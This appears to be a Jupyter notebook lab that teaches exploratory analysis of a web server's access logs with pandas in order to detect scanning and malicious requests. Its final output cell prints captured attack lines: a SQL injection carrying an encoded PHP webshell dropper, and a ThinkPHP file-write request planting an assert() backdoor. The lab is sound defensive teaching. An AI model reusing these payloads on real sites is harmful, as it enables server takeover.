# Get Set Up

## Import Libraries

In [0]:
# pandas provides the DataFrame, a tabular data structure
import pandas as pd

# RE provides regular expression pattern matching
import re

# datetime provides a datetime object class and conversion utilities
from datetime import datetime

# Web file access
from urllib.request import urlopen

# Math provides additional math functions
import math


## Define Some Functions

In [0]:
def log_ReadFile(logfile):
  with open(logfile) as fh:
    loglines = fh.readlines()
  loglines = [line.strip() for line in loglines]
  return loglines

In [0]:
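def log_ReadURL(logfile):
  # fetch the file over HTTP(S); the context manager closes the connection
  with urlopen(logfile) as response:
    loglines = response.readlines()
  # lines arrive as bytes, so decode them before stripping whitespace
  loglines = [line.decode().strip() for line in loglines]
  return loglines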

In [0]:
def log_Parser(log_list, regx_obj, col_list):
  # initialize empty lists for results
  logs_parsed = []
  parse_fails = []
  
  # parse logs using supplied regex and column list
  for line in log_list:
    match = regx_obj.match(line)
    if match:
      logs_parsed.append([match.group(col) for col in col_list]) 
    else:
      parse_fails.append(line)
      
  # return parsed data and list of lines that were not parsed correctly
  return logs_parsed, parse_fails

## Load Data

In [0]:
# URL of source data file
access_url = "https://raw.githubusercontent.com/urbansec/ds101/master/access.log.2019-03-22"

# Read log files into lists
access_logs = log_ReadURL(access_url)

In [0]:
# IP reputation indicators
intel_url = "https://raw.githubusercontent.com/urbansec/ds101/master/av_ip_reputation_2019-04-07.csv"
intel_cols = ['ip', 'risk', 'reliability', 'activity', 'country', 'city', 'lat_lon', 'unknown']
intel_df = pd.read_csv(intel_url, sep='#', header=None, names=intel_cols)
intel_df = intel_df.drop(columns=['unknown'])

In [0]:
# display first 5 lines in list
#display(access_logs[:5])

## Parse Data

In [0]:
# define a regex pattern to parse lines into fields
# sample line:
# ['54.36.148.18 - - [22/Mar/2019:01:58:55 -0700] "GET /self.logs/error.log.2016-04-07.gz HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)"']
# raw strings (r'...') keep regex escapes such as \S and \s from being read as string escapes
web_access_pattern = re.compile(r'(?P<client_ip>\S+)'
                                r'\s+(?P<identity>\S+)'
                                r'\s+(?P<username>\S+)'
                                r'\s+\[(?P<date>[^\]]+)\]'
                                r'\s+\"(?P<request>[^"]+)\"'
                                r'\s+(?P<http_response>\d+)'
                                r'\s+(?P<bytes>\d+)'
                                r'\s+\"(?P<referrer>[^"]+)\"'
                                r'\s+\"(?P<user_agent>.*)')

# define list of columns to use
access_column_list = ['date', 'client_ip', 'request', 'http_response', 'bytes', 'referrer', 'user_agent']


# call parser
access_logs_parsed, access_logs_parsefail = log_Parser(access_logs, web_access_pattern, access_column_list)


### Troubleshooting Only

In [0]:
# test parsing
#access_logs_parsed[:5]

In [0]:
# did any lines fail to parse?
#access_logs_parsefail[:5]

## Data Frame

In [0]:
# convert to Pandas DataFrame and display it
access_logs_df = pd.DataFrame.from_records(access_logs_parsed, columns=access_column_list)
access_logs_df['date'] = pd.to_datetime(access_logs_df['date'], format='%d/%b/%Y:%H:%M:%S -0700')
access_logs_df['bytes'] = pd.to_numeric(access_logs_df['bytes'], errors='coerce')
display(access_logs_df.head())

| | date | client_ip | request | http_response | bytes | referrer | user_agent |
|---|---|---|---|---|---|---|---|
| 0 | 2019-03-22 01:55:15 | 101.89.29.92 | GET / HTTP/1.1 | 200 | 46424 | - | Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like... |
| 1 | 2019-03-22 01:57:37 | 54.36.148.43 | GET /self.logs/2015/access.log.2015-05-08.gz H... | 200 | 4813 | - | Mozilla/5.0 (compatible; AhrefsBot/6.1; +http:... |
| 2 | 2019-03-22 01:58:55 | 54.36.148.18 | GET /self.logs/error.log.2016-04-07.gz HTTP/1.1 | 404 | 284 | - | Mozilla/5.0 (compatible; AhrefsBot/6.1; +http:... |
| 3 | 2019-03-22 02:04:26 | 54.36.148.62 | GET /self.logs/access.log.2016-10-30.gz HTTP/1.1 | 404 | 284 | - | Mozilla/5.0 (compatible; AhrefsBot/6.1; +http:... |
| 4 | 2019-03-22 02:04:51 | 54.36.149.57 | GET /self.logs/2016/error.log.2016-05-19.gz HT... | 200 | 867 | - | Mozilla/5.0 (compatible; AhrefsBot/6.1; +http:... |


# Instructions

In this lab, you will combine techniques from the previous labs to explore an additional dataset.  Namely, you will look at the web access logs from the same server as the error logs we looked at in the Data Basics lab.

* To save time, the logs have been parsed already.  They are stored in a Pandas DataFrame called "access_logs_df".

* Conduct exploratory data analysis to gain insight into these logs and answer the questions defined below.  We recommend inserting text blocks to organize your work, if helpful.  Several collapsible "header" sections have been provided to guide your analysis.

* The IP reputation data used in the previous labs is also available as a DataFrame.  It is stored in the variable "intel_df".

**To begin, choose "Runtime -> Run All" from the menu options.**

# Get a Feel For the Data

To get started, here are two easy steps provided for you.  Take a look at a sample of the data.  Then examine some basic summary statistics for the entire DataFrame (you should still examine individual columns more carefully).

## Examine the Data

In [0]:
access_logs_df.head()

| | date | client_ip | request | http_response | bytes | referrer | user_agent |
|---|---|---|---|---|---|---|---|
| 0 | 2019-03-22 01:55:15 | 101.89.29.92 | GET / HTTP/1.1 | 200 | 46424 | - | Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like... |
| 1 | 2019-03-22 01:57:37 | 54.36.148.43 | GET /self.logs/2015/access.log.2015-05-08.gz H... | 200 | 4813 | - | Mozilla/5.0 (compatible; AhrefsBot/6.1; +http:... |
| 2 | 2019-03-22 01:58:55 | 54.36.148.18 | GET /self.logs/error.log.2016-04-07.gz HTTP/1.1 | 404 | 284 | - | Mozilla/5.0 (compatible; AhrefsBot/6.1; +http:... |
| 3 | 2019-03-22 02:04:26 | 54.36.148.62 | GET /self.logs/access.log.2016-10-30.gz HTTP/1.1 | 404 | 284 | - | Mozilla/5.0 (compatible; AhrefsBot/6.1; +http:... |
| 4 | 2019-03-22 02:04:51 | 54.36.149.57 | GET /self.logs/2016/error.log.2016-05-19.gz HT... | 200 | 867 | - | Mozilla/5.0 (compatible; AhrefsBot/6.1; +http:... |


## Summary Statistics

In [0]:
access_logs_df.describe(include='all')

| | date | client_ip | request | http_response | bytes | referrer | user_agent |
|---|---|---|---|---|---|---|---|
| count | 1305 | 1305 | 1305 | 1305.0 | 1305.0 | 1305 | 1305 |
| unique | 974 | 576 | 503 | 5.0 | | 67 | 135 |
| top | 2019-03-23 01:52:10 | 222.186.57.109 | GET / HTTP/1.1 | 200.0 | | - | Mozilla/5.0 (compatible; AhrefsBot/6.1; +http:... |
| freq | 32 | 23 | 306 | 837.0 | | 886 | 241 |
| first | 2019-03-22 01:55:15 | | | | | | |
| last | 2019-03-23 02:08:53 | | | | | | |
| mean | | | | | 150253.3 | | |
| std | | | | | 1735781.0 | | |
| min | | | | | 130.0 | | |
| 25% | | | | | 295.0 | | |


Based on a quick look at the statistics, there are some factors that stand out as worthy of further investigation.

* The standard deviation of bytes transferred per request (about 1.7 million) is more than ten times the mean (about 150,000).  This suggests a heavily skewed distribution in which a small number of very large values dominate.
* Nearly two-thirds of the HTTP response codes (837 of 1305) are 200.  Rows containing other values may be of interest.
* About two-thirds of the HTTP referrers (886 of 1305) are blank.  Rows containing non-blank values may be of interest.


We should also be sure to explore the data contained in the remaining fields.
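
The point about the standard deviation can be checked numerically.  The sketch below uses a small synthetic series (not the lab data) to show how a single very large value pushes both the mean and the standard deviation far above the median.

```python
import pandas as pd

# Synthetic byte counts (illustrative only, not the lab data):
# several small responses plus one very large download.
sample_bytes = pd.Series([284, 284, 295, 310, 867, 4813, 46424, 25_000_000])

mean_bytes = sample_bytes.mean()
median_bytes = sample_bytes.median()
std_bytes = sample_bytes.std()

# A standard deviation above the mean, with the mean far above the median,
# points to a long right tail driven by a few large values.
print(f"mean={mean_bytes:.1f} median={median_bytes:.1f} std={std_bytes:.1f}")
```

Comparing the mean with the median in this way is a quick check to run before plotting.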

# Data Transfer (bytes)

Start by creating a histogram of the "bytes" column to understand the shape of the data.
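
As a rough illustration of what a histogram computes, the sketch below bins a synthetic "bytes" column into equal-width ranges and counts the rows in each.  The DataFrame name `demo_df` and its values are assumptions made for this example.  In a notebook you would usually plot the column instead, as noted in the final comment.

```python
import pandas as pd

# Synthetic stand-in for access_logs_df (values are illustrative only).
demo_df = pd.DataFrame(
    {"bytes": [284, 284, 295, 310, 867, 4813, 46424, 25_000_000]}
)

# value_counts(bins=...) splits the value range into equal-width bins and
# counts the rows in each one, which is the table a histogram would draw.
bin_counts = demo_df["bytes"].value_counts(bins=5, sort=False)
print(bin_counts)

# In a notebook, the plotted equivalent is typically:
# demo_df["bytes"].hist(bins=5)
```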

In [0]:
# Create a histogram


Almost all of the datapoints are concentrated at the very low end of the spectrum.  Select the rows of the DataFrame with bytes > 1e7 (10,000,000) to see if high values reveal anything interesting.
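
Filtering on a threshold is done with a boolean mask.  The following is a minimal sketch on synthetic rows, where `demo_df` and the file names in the requests are hypothetical.

```python
import pandas as pd

# Synthetic stand-in for access_logs_df; IPs come from documentation ranges.
demo_df = pd.DataFrame({
    "client_ip": ["198.51.100.7", "203.0.113.9", "198.51.100.7"],
    "request": ["GET / HTTP/1.1", "GET /big.iso HTTP/1.1", "GET /a.gz HTTP/1.1"],
    "bytes": [46424, 25_000_000, 284],
})

# The comparison yields a True/False Series; indexing with it keeps True rows.
large_transfers = demo_df[demo_df["bytes"] > 1e7]
print(large_transfers)
```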

In [0]:
# Filter the dataframe to rows with large values of the "bytes" column


Now filter the dataframe and display a histogram showing only the rows closer to zero (bytes < 1000) to see the frequencies of the smaller values.

In [0]:
# Filter to rows with bytes < 1000 and display a histogram


The majority of these values seem to lie between 200 and 700 bytes.  Examine rows where bytes < 200.

In [0]:
# Display rows with bytes < 200


Since nothing so far has seemed unusual, let's look at the spike in the histogram.  Filter the data to rows where the value of "bytes" is between 200 and 400.
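
One detail worth knowing when filtering on a range: the pandas `.between()` method includes both endpoints by default.  The short sketch below demonstrates this on synthetic values.

```python
import pandas as pd

# Synthetic byte counts chosen to sit on and around the range boundaries.
sizes = pd.Series([130, 200, 284, 400, 401, 867])

# between(200, 400) keeps values where 200 <= value <= 400.
in_range = sizes[sizes.between(200, 400)]
print(in_range.tolist())
```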

In [0]:
# Filter to rows where bytes is between 200 - 400 and display
# Hint: you can use the ".between()" method, e.g. df[df['column'].between(200, 400)]


This range seems to contain many errors (HTTP response 404).  Examining the number of bytes transferred has not revealed much of interest from a security perspective.  It has, however, led us to a second area of inquiry.

# HTTP Response Codes (http_response)

As we saw in our initial summary statistics, the majority of HTTP response codes in the dataset are "200" (meaning the request succeeded).  List the frequency of each response code to get a sense of how these are distributed.
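
A frequency listing can be sketched as follows.  The codes are synthetic and stored as strings, because the parser in this lab returns regex groups as text and only the "date" and "bytes" columns are converted afterwards.

```python
import pandas as pd

# Synthetic response codes (strings, as the regex groups are returned).
codes = pd.Series(["200", "404", "200", "301", "404", "200"])

# Absolute counts, most frequent first.
code_counts = codes.value_counts()

# normalize=True reports each code's share of all rows instead.
code_share = codes.value_counts(normalize=True)

print(code_counts)
print(code_share)
```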

In [0]:
# Display frequency counts for the "http_response" variable
# Hint: use the ".value_counts()" method


HTTP response code 404 indicates a requested file was not found.  Display a sample of 10 rows containing this response code.

In [0]:
# Display the first 10 rows where the "http_response" variable is "404"
# Hint: using ".head(10)" instead of ".head()" will show 10 rows instead of 5


There seems to be a single IP causing many of the 404 errors.  Now filter the dataset to rows where the response code is 404 again, but this time display the frequency counts of the top IPs.  This will show us which IP addresses are causing repeated 404 errors.
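
Chaining a filter with a frequency count might look like the sketch below.  The data is synthetic, and `demo_df` is a hypothetical stand-in for the lab's DataFrame.

```python
import pandas as pd

# Synthetic stand-in for access_logs_df; IPs come from documentation ranges.
demo_df = pd.DataFrame({
    "client_ip": ["203.0.113.9", "203.0.113.9", "198.51.100.7",
                  "203.0.113.9", "192.0.2.44"],
    "http_response": ["404", "404", "200", "404", "404"],
})

# Keep only the 404 rows, then count how often each IP appears among them.
not_found = demo_df[demo_df["http_response"] == "404"]
ip_counts = not_found["client_ip"].value_counts()
print(ip_counts.head())
```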

In [0]:
# Display frequency counts of IPs, after filtering the dataset to contain only rows where the response code is 404


Finally, let's take one of the most egregious IPs and look at all the activity it is responsible for.  Filter the dataset to include only rows from one of these IPs and display the first 10 rows.
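
One way to pick the IP programmatically rather than copying it by hand is `idxmax()`, sketched below on synthetic data.  Note that the final filter is on the IP alone, so it returns all of that client's requests and not just the 404s.

```python
import pandas as pd

# Synthetic stand-in for access_logs_df (illustrative values only).
demo_df = pd.DataFrame({
    "client_ip": ["203.0.113.9", "203.0.113.9", "198.51.100.7",
                  "203.0.113.9", "192.0.2.44"],
    "request": ["POST /a.php HTTP/1.1", "POST /b.php HTTP/1.1",
                "GET / HTTP/1.1", "GET / HTTP/1.1", "GET /x HTTP/1.1"],
    "http_response": ["404", "404", "200", "200", "404"],
})

# IP with the most 404 responses.
is_404 = demo_df["http_response"] == "404"
top_ip = demo_df.loc[is_404, "client_ip"].value_counts().idxmax()

# Everything that IP did, regardless of response code.
ip_activity = demo_df[demo_df["client_ip"] == top_ip]
print(ip_activity.head(10))
```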

In [0]:
# Display the first 10 rows of activity caused by one of the IPs above that repeatedly causes 404 errors


You should see repeated POST requests for PHP files that do not exist.  This likely indicates someone running an automated tool that attempts to exploit known vulnerabilities in common web frameworks, such as WordPress.
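
The pattern described above (POST requests for missing PHP files) can also be expressed as a combined filter.  This is only a sketch: the request strings are made up, and the three conditions are an assumption about what "scanner-like" means, not a definitive detection rule.

```python
import pandas as pd

# Synthetic requests (illustrative only).
demo_df = pd.DataFrame({
    "request": ["POST /wp-login.php HTTP/1.1", "GET / HTTP/1.1",
                "POST /xmlrpc.php HTTP/1.1", "GET /index.php HTTP/1.1"],
    "http_response": ["404", "200", "404", "200"],
})

is_post = demo_df["request"].str.startswith("POST ")
is_php = demo_df["request"].str.contains(r"\.php\b", regex=True)
is_missing = demo_df["http_response"] == "404"

# Combine the three boolean masks with & (element-wise AND).
suspicious = demo_df[is_post & is_php & is_missing]
print(suspicious)
```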

**Good job!  Using basic data manipulation and statistical guidance, you have detected malicious activity!**

# HTTP Referrer (referrer)

Going back to the summary stats we generated at the beginning of this exercise, we noticed that more than half of the HTTP referrers were blank (i.e. set to "-").  Our previous exploration of number of bytes transferred and HTTP response codes led us to believe that the majority of our dataset represents benign activity.  Therefore, let's examine the less common case where the referrer is not blank to see if anything interesting is revealed.

Start by filtering to display only rows where the "referrer" field is not equal to "-".  This can be written as **referrer != "-"**

In [0]:
# Display the first 10 rows where referrer != "-"


You may notice some of the initial activity looks like web scanning activity again (POST requests for files that don't exist).  Next, perform the same filter for rows where the referrer isn't blank, but this time list the most frequent IPs.

In [0]:
# Display the most frequent IPs creating requests where the referrer isn't blank


You should notice significant overlap between this list and the previous list of malicious IPs identified through our response code analysis.
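
Rather than comparing two lists by eye, the overlap can be computed with a set intersection.  The sketch below uses synthetic rows and hypothetical referrer URLs.

```python
import pandas as pd

# Synthetic stand-in for access_logs_df (illustrative values only).
demo_df = pd.DataFrame({
    "client_ip": ["203.0.113.9", "203.0.113.9", "198.51.100.7",
                  "192.0.2.44", "192.0.2.44"],
    "http_response": ["404", "404", "200", "404", "200"],
    "referrer": ["http://example.com/a", "-", "http://example.com/c",
                 "http://example.com/b", "-"],
})

# IPs that triggered at least one 404.
ips_404 = set(demo_df.loc[demo_df["http_response"] == "404", "client_ip"])

# IPs that sent at least one non-blank referrer.
ips_referrer = set(demo_df.loc[demo_df["referrer"] != "-", "client_ip"])

# IPs that appear in both groups.
overlap = ips_404 & ips_referrer
print(sorted(overlap))
```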

**Nice work!  By continuing the analysis, you discovered a second relationship in the data that could be used to detect or confirm malicious activity!**

# Client IP Address (client_ip)

Our initial summary statistics did not reveal anything particularly interesting about this field.  With 1305 rows, there are 576 unique IPs, and the most frequent IP occurs only 23 times.

One thing that might yield some insights is adding context by checking to see if any of the IPs appear in our list of threat indicators (stored in the "intel_df" DataFrame).

Join our log dataset with our IP reputation data and display any matching items (refer to the Data Basics lab for an example).
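
The general shape of such a join is sketched below.  The column names mirror those used in this lab ("client_ip" in the logs, "ip" in the reputation data), but the rows themselves are made up.

```python
import pandas as pd

# Synthetic log rows and reputation rows (illustrative values only).
logs_df = pd.DataFrame({
    "client_ip": ["203.0.113.9", "198.51.100.7", "203.0.113.9"],
    "request": ["POST /a.php HTTP/1.1", "GET / HTTP/1.1", "POST /b.php HTTP/1.1"],
})
reputation_df = pd.DataFrame({
    "ip": ["203.0.113.9", "192.0.2.200"],
    "risk": [4, 2],
    "activity": ["Scanning Host", "Spamming"],
})

# An inner join keeps only log rows whose IP also appears in the reputation data.
matches = logs_df.merge(reputation_df, how="inner",
                        left_on="client_ip", right_on="ip")
print(matches)
```

An inner join is used here because only matching rows are of interest.  A left join would keep every log row and leave the reputation columns empty where no match exists.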

In [0]:
# Join the log data with the ip reputation data and display matches


# Bonus Content

If you have made it this far and want to do some additional analysis, good on you!  Please enjoy these bonus challenges.

## User Agent String (user_agent)

The user agent string helps identify the browser version, allowing a web server to tailor its response accordingly.  If you have not worked with user agent strings before, be aware that they are relatively messy.  Our initial summary statistics didn't reveal anything unusual about this column.  In the interest of time, we will perform a quick analysis on the length of the strings, rather than sifting through the text itself.

The code snippet below generates a new dataframe that contains a single column.  The values in that column correspond to the length of each user agent string from the initial DataFrame.

In [0]:
ua_len_df = pd.DataFrame(access_logs_df['user_agent'].str.len())
ua_len_df = ua_len_df.rename(columns={'user_agent':'length'})

Create a histogram from the "ua_len_df" DataFrame to get a feel for the distribution of the lengths.

In [0]:
# Create a histogram of the ua_len_df DataFrame


Based on the histogram, decide what a "typical" range is for the length of a user agent string.  Then examine values that fall outside that range.  Because of the way we generated the DataFrame of lengths, we can use it to index a subset of the original data.
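
Indexing one DataFrame with a mask built from another works because both share the same row index.  The sketch below illustrates this with three synthetic user agent strings.  The threshold of 15 characters is an arbitrary assumption for the example.

```python
import pandas as pd

# Synthetic user agent strings (illustrative only).
logs_df = pd.DataFrame({
    "user_agent": ["-", "curl/7.58.0",
                   "Mozilla/5.0 (compatible; ExampleBot/1.0)"],
})

# Same construction as ua_len_df: one column holding each string's length.
lengths_df = pd.DataFrame(logs_df["user_agent"].str.len())
lengths_df = lengths_df.rename(columns={"user_agent": "length"})

# The mask comes from lengths_df but selects rows of logs_df, because the
# two frames have identical row labels (0, 1, 2).
short_agents = logs_df[lengths_df["length"] < 15]
print(short_agents)
```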

Below is an example of how to view especially long user agent strings.  Feel free to modify it based on the range you determined.

In [0]:
# Examine long user agent strings
access_logs_df[ua_len_df['length'] > 150].user_agent.value_counts()

Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.102011-10-16 20:23:10"                                                                                      6
Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"                                                5
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5 (Applebot/0.1; +http://www.apple.com/go/applebot)"                                                                                5
Mozilla/5.0 (Linux; Android 5.1.1; vivo V3 Build/LMY47V; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/044408 Mobile Safari/537.36 V1_AND_SQ_4.6.1_9_YYB_D 3.7.1 QQ/5.3.1.704 NetType/4G 10000519"    3
Mozi

In [0]:
# Examine short user agent strings


There doesn't seem to be anything unusual about the longer strings.  If your examination of the shorter strings reveals anything suspicious, display web activity associated with those user agent strings.

In [0]:
# Display access logs with suspicious user agent strings


## Examining Parse Errors

Examining errors that occur during parsing data is an important part of exploratory data analysis that we skipped in this lab for the sake of time.  It is important to resolve parsing issues and account for corrupt or missing data.

One interesting aspect of this is that parse errors are often caused by irregularities in the data itself.  Web access logs that were not parsed correctly are stored in a list named "access_logs_parsefail".

Examine these log lines using your web security expertise to see if they indicate unusual or malicious activity.
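
To see why irregular data causes parse failures, the sketch below runs the lab's regex against two lines.  The first is the sample line from the Parse Data section.  The second is a shortened, hypothetical imitation of an injection attempt, with escaped double quotes inside the referrer field.  Because the referrer group only accepts characters up to the first double quote, the embedded quote ends the field early and the rest of the pattern no longer lines up.

```python
import re

# Pattern copied from the Parse Data cell, written with raw strings.
web_access_pattern = re.compile(r'(?P<client_ip>\S+)'
                                r'\s+(?P<identity>\S+)'
                                r'\s+(?P<username>\S+)'
                                r'\s+\[(?P<date>[^\]]+)\]'
                                r'\s+\"(?P<request>[^"]+)\"'
                                r'\s+(?P<http_response>\d+)'
                                r'\s+(?P<bytes>\d+)'
                                r'\s+\"(?P<referrer>[^"]+)\"'
                                r'\s+\"(?P<user_agent>.*)')

# A well-formed line: the referrer is "-" and contains no quotes.
good_line = ('54.36.148.18 - - [22/Mar/2019:01:58:55 -0700] '
             '"GET /self.logs/error.log.2016-04-07.gz HTTP/1.1" 404 284 "-" '
             '"Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)"')

# Hypothetical malformed line: the referrer contains escaped double quotes.
bad_line = (r'203.0.113.5 - - [22/Mar/2019:02:35:31 -0700] '
            r'"GET /user.php?act=login HTTP/1.1" 404 294 '
            r'"a:1:{s:3:\"num\";}" "Mozilla/5.0"')

good_match = web_access_pattern.match(good_line)
bad_match = web_access_pattern.match(bad_line)

print(good_match is not None)  # the well-formed line parses
print(bad_match is None)       # the embedded quote breaks the match
```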

In [0]:
# Examine log lines that were not parsed correctly
access_logs_parsefail

['123.129.224.7 - - [22/Mar/2019:02:35:31 -0700] "GET /user.php?act=login HTTP/1.1" 404 294 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\\"num\\";s:288:\\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A325A6B5A334575634768774A79776E50443977614841675A585A686243676B583142505531526262475678645630704F79412F506963702729293B2F2F7D787878,10-- -\\";s:2:\\"id\\";s:3:\\"\'/*\\";}" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"',
 '123.129.224.7 - - [22/Mar/2019:02:35:32 -0700] "GET /?s=index/%5Cthink%5Ctemplate%5Cdriver%5Cfile/write&cacheFile=xarhm.php&content=%3C?php%20assert($_REQUEST%5B%22ysy%22%5D);?%3Eysydjsjxbei37 HTTP/1.1" 200 46423 "http://www.secrepo.com/?s=index/\\\\think\\\\template\\\\driver\\\\file/write&cacheFile=xarhm.php&content=<?php assert($_REQUEST[\\"ysy\\"]);?>ysydjsjxbei37" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)"',
 '123.129.224.7 - - [22/Mar/2019:0